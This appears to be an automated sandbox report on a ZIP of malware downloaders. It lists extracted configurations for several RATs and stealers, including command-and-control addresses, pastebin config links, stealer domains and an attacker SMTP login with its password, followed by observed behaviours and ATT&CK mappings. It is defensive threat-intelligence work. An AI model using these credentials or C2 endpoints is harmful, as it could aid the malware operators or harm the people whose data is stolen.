agenttesla | 16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267

max time kernel
592s
max time network
596s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
09-05-2024 09:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Downloaders.zip
Size

12KB
MD5

94fe78dc42e3403d06477f995770733c
SHA1

ea6ba4a14bab2a976d62ea7ddd4940ec90560586
SHA256

16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267
SHA512

add85726e7d2c69068381688fe84defe820f600e6214eff029042e3002e9f4ad52dde3b8bb28f4148cca1b950cd54d3999ce9e8445c4562d1ef2efdb1c6bdeff
SSDEEP

384:6BfwcSEp9ZjKXSBIDv4dDfjlMJ7HWTHWB:efACW6Dr8HWTHWB

Malware Config

Extracted

Credentials

Protocol: smtp
Host:
us2.smtp.mailhostbox.com
Port:
587
Username:
[email protected]
Password:
Password: )NYyffR0

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

91.92.254.40:4782

Mutex

56928f7b-c5c9-4b24-af59-8c509ce1d27e

Attributes

encryption_key
60574F1741A0786C827AF49C652AB3A7DA0533D1
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Windows System
subdirectory
SubDir

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
us2.smtp.mailhostbox.com
Port:
587
Username:
[email protected]
Password:
Password: )NYyffR0
Email To:
[email protected]

Extracted

Family

remcos

Botnet

RemoteHost

107.173.4.16:2560

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
true
install_flag
false
keylog_crypt
true
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-KDW6BI
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
startup_value
take_screenshot_option
false
take_screenshot_time
5

Extracted

Family

formbook

Version

4.1

Campaign

ht3d

Decoy

derlon.net

46gem.vip

bridal-heart-boutique.com

porarquitectura.com

durkal.online

9916k.vip

nativegarden.net

hoodjac.com

coachwunder.com

jutuowangluo.com

frankmontagna.com

jalenx.com

yhxg.net

brasserie-bro.com

whitecoatprivilege.com

sigmadriving.com

inhkipcmacau.com

freediveexperience.com

52iwin.com

aaditt.com

Extracted

Family

risepro

147.45.47.126:58709

Extracted

Family

amadey

Version

4.20

http://193.233.132.139

Attributes

install_dir
5454e6f062
install_file
explorta.exe
strings_key
c7a869c5ba1d72480093ec207994e2bf
url_paths
/sev56rkm/index.php

rc4.plain

Extracted

Family

redline

Botnet

7001210066

https://pastebin.com/raw/KE5Mft0T

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

Mutex

NvCHbLc8lsi9

Attributes

delay
3
install
false
install_folder
%AppData%
pastebin_config
https://pastebin.ai/raw/o87oy6ywss

aes.plain

Extracted

Family

lumma

https://acceptabledcooeprs.shop/api

https://obsceneclassyjuwks.shop/api

https://zippyfinickysofwps.shop/api

https://miniaturefinerninewjs.shop/api

https://plaintediousidowsko.shop/api

https://sweetsquarediaslw.shop/api

https://holicisticscrarws.shop/api

https://boredimperissvieos.shop/api

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Blackmoon, KrBanker
Blackmoon also known as KrBanker is banking trojan first discovered in early 2014.
trojan banker blackmoon
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Detect Blackmoon payload 2 IoCs

resource	yara_rule
behavioral1/files/0x0009000000023501-14745.dat	family_blackmoon
behavioral1/files/0x000700000002350e-16333.dat	family_blackmoon

Detect ZGRat V1 5 IoCs

resource	yara_rule
behavioral1/memory/1532-973-0x0000000005830000-0x0000000005CE0000-memory.dmp	family_zgrat_v1
behavioral1/memory/6224-7024-0x0000000005370000-0x0000000005628000-memory.dmp	family_zgrat_v1
behavioral1/memory/7144-17993-0x0000000005490000-0x0000000005578000-memory.dmp	family_zgrat_v1
behavioral1/files/0x0007000000023607-42292.dat	family_zgrat_v1
behavioral1/files/0x000c0000000235b9-42767.dat	family_zgrat_v1

Formbook
Formbook is a data stealing malware which is capable of stealing data.
trojan spyware stealer formbook
Lumma Stealer
An infostealer written in C++ first seen in August 2022.
stealer lumma

Process spawned unexpected child process 54 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4520	2172	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3632	2172	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5536	2172	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5392	2172	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4028	2172	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	8564	2172	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2460	2172	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7332	2172	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1604	2172	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6252	2172	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7304	2172	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6684	2172	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2760	2172	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7972	2172	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7276	2172	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6744	2172	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6156	2172	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7608	2172	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3900	2172	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	64	2172	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1376	2172	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5736	2172	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4764	2172	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3676	2172	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2284	2172	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7472	2172	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2528	2172	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6988	2172	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6052	2172	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6556	2172	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1828	2172	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1232	2172	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4220	2172	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	9124	2172	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	9208	2172	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6088	2172	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	8236	2172	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6960	2172	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6788	2172	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6664	2172	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	8716	2172	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	8464	2172	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	400	2172	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2628	2172	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2308	2172	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	8196	2172	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5212	2172	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	8336	2172	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7792	2172	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7196	2172	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	8708	2172	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7848	2172	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7060	2172	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4700	2172	schtasks.exe	96

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 2 IoCs

resource	yara_rule
behavioral1/files/0x000700000001dabf-128.dat	family_quasar
behavioral1/memory/5316-135-0x0000000000790000-0x0000000000AB4000-memory.dmp	family_quasar

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

resource	yara_rule
behavioral1/memory/4316-1202-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
stealer risepro
ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral1/files/0x000a0000000234c1-5558.dat	family_asyncrat

DCRat payload 2 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

resource	yara_rule
behavioral1/files/0x000b000000023590-41787.dat	dcrat
behavioral1/files/0x00070000000235d5-42126.dat	dcrat

Formbook payload 1 IoCs

rat

resource	yara_rule
behavioral1/memory/5660-521-0x0000000000400000-0x000000000042F000-memory.dmp	formbook

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	VNSeRtG2pRnniLB_eQlq.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorta.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorta.exe

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

resource	yara_rule
behavioral1/memory/5232-294-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral1/memory/3396-297-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Nirsoft 3 IoCs

resource	yara_rule
behavioral1/memory/3396-297-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral1/memory/3680-296-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral1/memory/5232-294-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft

Command and Scripting Interpreter: PowerShell 1 TTPs 18 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
7516	powershell.exe
9032	powershell.exe
5196	powershell.exe
5400	powershell.exe
7268	powershell.exe
8796	powershell.exe
8828	powershell.exe
8748	powershell.exe
5148	powershell.exe
4220	powershell.exe
6728	powershell.exe
7248	powershell.exe
7332	powershell.exe
8316	powershell.exe
7692	powershell.exe
6960	powershell.exe
9172	powershell.exe
2124	powershell.exe

Contacts a large (690) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File created	C:\Windows\system32\Drivers\PROCEXP152.SYS	procexp64.exe
File created	C:\Windows\system32\Drivers\PROCEXP152.SYS	procexp64.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
2128	netsh.exe

Sets file to hidden 1 TTPs 1 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
8716	attrib.exe

Sets service image path in registry 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS"	procexp64.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS"	procexp64.exe

.NET Reactor proctector 1 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral1/files/0x000a000000023535-24380.dat	net_reactor

Checks BIOS information in registry 2 TTPs 6 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	VNSeRtG2pRnniLB_eQlq.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	VNSeRtG2pRnniLB_eQlq.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorta.exe

Checks computer location settings 2 TTPs 11 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation	HJCL.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation	VNSeRtG2pRnniLB_eQlq.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation	4363463463464363463463463.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation	AnyDesk.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation	New Text Document mod.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation	HJCL.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation	TJeAjWEEeH.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation	New Text Document mod.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation	lomik.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation	AnyDesk.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation	4363463463464363463463463.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS131.lnk	lomik.exe

Executes dropped EXE 64 IoCs

pid	Process
2896	4363463463464363463463463.exe
5684	svcyr.exe
1884	lqrjma.exe
1916	procexp64.exe
3064	New Text Document mod.exe
408	current.exe
5992	hjv.exe
3276	TJeAjWEEeH.exe
5316	Client-built.exe
2188	HJCL.exe
1784	hjv.exe
2408	Client.exe
5180	crypted.exe
4680	svcyr.exe
2164	HJCL.exe
5188	hjv.exe
5212	HJCL.exe
5652	host_so.exe
5308	current.exe
960	host_so.exe
5016	host_so.exe
5744	HJCL.exe
3944	HJCL.exe
3396	HJCL.exe
5232	HJCL.exe
3680	HJCL.exe
4944	New Text Document mod.exe
1832	html.exe
4308	hjv.exe
2564	HJCL.exe
3520	TJeAjWEEeH.exe
3356	svcyr.exe
4348	lomik.exe
5132	procexp64.exe
2268	eee01.exe
4312	update.exe
1140	crypted.exe
3148	Client-built.exe
5660	html.exe
6048	immortal_genius_20240411075733898.exe
4412	VNSeRtG2pRnniLB_eQlq.exe
2684	explorta.exe
6044	4363463463464363463463463.exe
1028	dControl.exe
5388	dControl.exe
1844	cp.exe
956	dControl.exe
5732	AnyDesk.exe
4328	AnyDesk.exe
1640	AnyDesk.exe
1532	net.exe
3320	140.exe
388	explorta.exe
4628	060.exe
4460	060.tmp
1392	MSI.CentralServer.exe
5972	cp.exe
3792	140.exe
3388	mp3cutterjoinerfree.exe
1468	mp3cutterjoinerfree.exe
3820	cryptography_module_windows.exe
2872	cryptography_module_windows.exe
5544	pei.exe
1700	%E7%A6%81%E6%AD%A2%E6%B3%A8%E9%94%[email protected]

Loads dropped DLL 29 IoCs

pid	Process
1640	AnyDesk.exe
4328	AnyDesk.exe
4460	060.tmp
2872	cryptography_module_windows.exe
2872	cryptography_module_windows.exe
2872	cryptography_module_windows.exe
2872	cryptography_module_windows.exe
2872	cryptography_module_windows.exe
2872	cryptography_module_windows.exe
2872	cryptography_module_windows.exe
2872	cryptography_module_windows.exe
2872	cryptography_module_windows.exe
2872	cryptography_module_windows.exe
2872	cryptography_module_windows.exe
2872	cryptography_module_windows.exe
2872	cryptography_module_windows.exe
2872	cryptography_module_windows.exe
2872	cryptography_module_windows.exe
2872	cryptography_module_windows.exe
2872	cryptography_module_windows.exe
2872	cryptography_module_windows.exe
2872	cryptography_module_windows.exe
2872	cryptography_module_windows.exe
2872	cryptography_module_windows.exe
2872	cryptography_module_windows.exe
2872	cryptography_module_windows.exe
2872	cryptography_module_windows.exe
2872	cryptography_module_windows.exe
2872	cryptography_module_windows.exe

Reads WinSCP keys stored on the system 2 TTPs
Tries to access WinSCP stored sessions.
spyware stealer

Data from Local System
T1005

Credentials in Registry
T1552.002
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Themida packer 17 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral1/files/0x0008000000023409-546.dat	themida
behavioral1/memory/4412-573-0x0000000000780000-0x0000000000CCC000-memory.dmp	themida
behavioral1/memory/4412-574-0x0000000000780000-0x0000000000CCC000-memory.dmp	themida
behavioral1/memory/4412-568-0x0000000000780000-0x0000000000CCC000-memory.dmp	themida
behavioral1/memory/4412-569-0x0000000000780000-0x0000000000CCC000-memory.dmp	themida
behavioral1/memory/4412-588-0x0000000000780000-0x0000000000CCC000-memory.dmp	themida
behavioral1/memory/2684-589-0x00000000004E0000-0x0000000000A2C000-memory.dmp	themida
behavioral1/memory/2684-951-0x00000000004E0000-0x0000000000A2C000-memory.dmp	themida
behavioral1/memory/388-1519-0x00000000004E0000-0x0000000000A2C000-memory.dmp	themida
behavioral1/memory/388-1719-0x00000000004E0000-0x0000000000A2C000-memory.dmp	themida
behavioral1/memory/3320-9961-0x00000000004E0000-0x0000000000A2C000-memory.dmp	themida
behavioral1/memory/3320-10467-0x00000000004E0000-0x0000000000A2C000-memory.dmp	themida
behavioral1/memory/7348-13141-0x0000000000AD0000-0x000000000101C000-memory.dmp	themida
behavioral1/memory/7348-12978-0x0000000000AD0000-0x000000000101C000-memory.dmp	themida
behavioral1/memory/9208-21412-0x00000000004E0000-0x0000000000A2C000-memory.dmp	themida
behavioral1/files/0x000900000002351f-24362.dat	themida
behavioral1/files/0x000800000002353d-24399.dat	themida

UPX packed file 7 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0007000000023428-607.dat	upx
behavioral1/memory/1028-612-0x0000000000400000-0x00000000004CD000-memory.dmp	upx
behavioral1/memory/5388-647-0x0000000000400000-0x00000000004CD000-memory.dmp	upx
behavioral1/memory/1028-646-0x0000000000400000-0x00000000004CD000-memory.dmp	upx
behavioral1/memory/5388-669-0x0000000000400000-0x00000000004CD000-memory.dmp	upx
behavioral1/memory/956-670-0x0000000000400000-0x00000000004CD000-memory.dmp	upx
behavioral1/memory/956-954-0x0000000000400000-0x00000000004CD000-memory.dmp	upx

Unexpected DNS network traffic destination 1 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	91.211.247.248

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	HJCL.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	lomik.exe
Key opened	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	lomik.exe
Key opened	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	lomik.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\mpTrle = "C:\\Users\\Admin\\AppData\\Roaming\\mpTrle\\mpTrle.exe"	hjv.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\mpTrle = "C:\\Users\\Admin\\AppData\\Roaming\\mpTrle\\mpTrle.exe"	hjv.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RageMP131 = "C:\\Users\\Admin\\AppData\\Local\\RageMP131\\RageMP131.exe"	lomik.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdobeUpdaterV131_ab414e7959b5772c8d538ffeee266027 = "C:\\Users\\Admin\\AppData\\Local\\AdobeUpdaterV131_ab414e7959b5772c8d538ffeee266027\\AdobeUpdaterV131.exe"	lomik.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 3 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	VNSeRtG2pRnniLB_eQlq.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	explorta.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	explorta.exe

Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\V:	procexp64.exe
File opened (read-only)	\??\A:	procexp64.exe
File opened (read-only)	\??\G:	procexp64.exe
File opened (read-only)	\??\O:	procexp64.exe
File opened (read-only)	\??\P:	procexp64.exe
File opened (read-only)	\??\E:	procexp64.exe
File opened (read-only)	\??\I:	procexp64.exe
File opened (read-only)	\??\L:	procexp64.exe
File opened (read-only)	\??\W:	procexp64.exe
File opened (read-only)	\??\X:	procexp64.exe
File opened (read-only)	\??\I:	procexp64.exe
File opened (read-only)	\??\R:	procexp64.exe
File opened (read-only)	\??\U:	procexp64.exe
File opened (read-only)	\??\F:	procexp64.exe
File opened (read-only)	\??\K:	procexp64.exe
File opened (read-only)	\??\T:	procexp64.exe
File opened (read-only)	\??\U:	procexp64.exe
File opened (read-only)	\??\Y:	procexp64.exe
File opened (read-only)	\??\F:	procexp64.exe
File opened (read-only)	\??\E:	procexp64.exe
File opened (read-only)	\??\Q:	procexp64.exe
File opened (read-only)	\??\S:	procexp64.exe
File opened (read-only)	\??\M:	procexp64.exe
File opened (read-only)	\??\Z:	procexp64.exe
File opened (read-only)	\??\N:	procexp64.exe
File opened (read-only)	\??\V:	procexp64.exe
File opened (read-only)	\??\Z:	procexp64.exe
File opened (read-only)	\??\A:	procexp64.exe
File opened (read-only)	\??\P:	procexp64.exe
File opened (read-only)	\??\X:	procexp64.exe
File opened (read-only)	\??\B:	procexp64.exe
File opened (read-only)	\??\B:	procexp64.exe
File opened (read-only)	\??\J:	procexp64.exe
File opened (read-only)	\??\K:	procexp64.exe
File opened (read-only)	\??\Q:	procexp64.exe
File opened (read-only)	\??\Y:	procexp64.exe
File opened (read-only)	\??\H:	procexp64.exe
File opened (read-only)	\??\M:	procexp64.exe
File opened (read-only)	\??\R:	procexp64.exe
File opened (read-only)	\??\L:	procexp64.exe
File opened (read-only)	\??\S:	procexp64.exe
File opened (read-only)	\??\T:	procexp64.exe
File opened (read-only)	\??\W:	procexp64.exe
File opened (read-only)	\??\J:	procexp64.exe
File opened (read-only)	\??\G:	procexp64.exe
File opened (read-only)	\??\H:	procexp64.exe
File opened (read-only)	\??\N:	procexp64.exe
File opened (read-only)	\??\O:	procexp64.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 64 IoCs

Web Service

T1102

flow	ioc
10939	pastebin.com
4868	pastebin.com
6737	pastebin.com
9529	pastebin.com
10306	pastebin.com
8054	pastebin.com
570	pastebin.com
2208	pastebin.com
4256	pastebin.com
4940	pastebin.com
9678	pastebin.com
4470	pastebin.com
5405	pastebin.com
9010	pastebin.com
9241	pastebin.com
9267	pastebin.com
9862	pastebin.com
488	pastebin.com
6675	pastebin.com
7646	pastebin.com
8224	pastebin.com
1978	pastebin.com
4024	pastebin.com
6471	pastebin.com
4995	pastebin.com
7333	pastebin.com
8370	pastebin.com
4827	pastebin.com
5144	pastebin.com
9800	pastebin.com
1045	pastebin.com
2767	2.tcp.eu.ngrok.io
2873	pastebin.com
4694	pastebin.com
2276	pastebin.com
2708	pastebin.com
2843	pastebin.com
7128	pastebin.com
387	pastebin.com
3492	pastebin.com
905	pastebin.com
1782	pastebin.com
4635	pastebin.com
6701	pastebin.com
631	pastebin.com
2864	pastebin.com
6776	pastebin.com
9981	pastebin.com
401	pastebin.com
2055	pastebin.com
3155	pastebin.com
2042	pastebin.com
3433	pastebin.com
6012	pastebin.com
6114	pastebin.com
3480	pastebin.com
9470	pastebin.com
5798	pastebin.com
10153	pastebin.com
1208	pastebin.com
1456	pastebin.com
3407	pastebin.com
5561	pastebin.com
